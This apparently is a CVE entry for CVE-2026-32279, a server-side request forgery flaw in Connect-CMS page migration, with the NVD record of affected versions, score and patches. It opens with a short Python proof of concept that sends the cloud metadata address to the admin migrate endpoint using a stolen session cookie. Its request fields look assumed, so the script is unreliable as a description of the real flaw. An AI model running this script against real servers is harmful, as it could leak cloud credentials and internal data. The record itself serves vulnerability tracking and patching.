CVE-2026-32279

# POC for CVE-2026-32279 (Conceptual) # This script demonstrates how an attacker might trigger the SSRF # by sending a crafted request to the migration endpoint. import requests target_url = "http://target-cms.com/admin/page/migrate" # Attacker controlled URL pointing to internal metadata service malicious_url = "http://169.254.169.254/latest/meta-data/" # Authentication is required (PR:H), assuming session cookie is obtained cookies = { "SESSIONID": "stolen_admin_session_id" } payload = { "url": malicious_url, "action": "import" } try: response = requests.post(target_url, data=payload, cookies=cookies) if response.status_code == 200: print("Request sent successfully. Check response for SSRF indication.") print(response.text[:200]) except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-32279", "sourceIdentifier": "[email protected]", "published": "2026-03-23T22:16:27.617", "lastModified": "2026-03-24T20:28:36.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, a Server-Side Request Forgery (SSRF) issue exists in the external page migration feature of the Page Management Plugin. Versions 1.41.1 and 2.41.1 contain a patch."}, {"lang": "es", "value": "Connect-CMS es un sistema de gestión de contenidos. En las versiones de la serie 1.x hasta la 1.41.0 inclusive y las versiones de la serie 2.x hasta la 2.41.0 inclusive, existe un problema de falsificación de petición del lado del servidor (SSRF) en la función de migración de páginas externas del plugin de Gestión de Páginas. Las versiones 1.41.1 y 2.41.1 contienen un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.41.1", "matchCriteriaId": "60B8BBDF-82BD-486D-AE17-7F59360E62C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.41.1", "matchCriteriaId": "0C11B4F0-DF29-473A-A285-9DA152DDCDE1"}]}]}], "references": [{"url": "https://github.com/opensource-workshop/connect-cms/commit/4a1a64a8f768a53e06a4239e25782d9e2e88fc63", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opensource-workshop/connect-cms/commit/617a874e14b8476da7c0760a06384b9da21bdd4f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-jh46-85jr-6ph9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}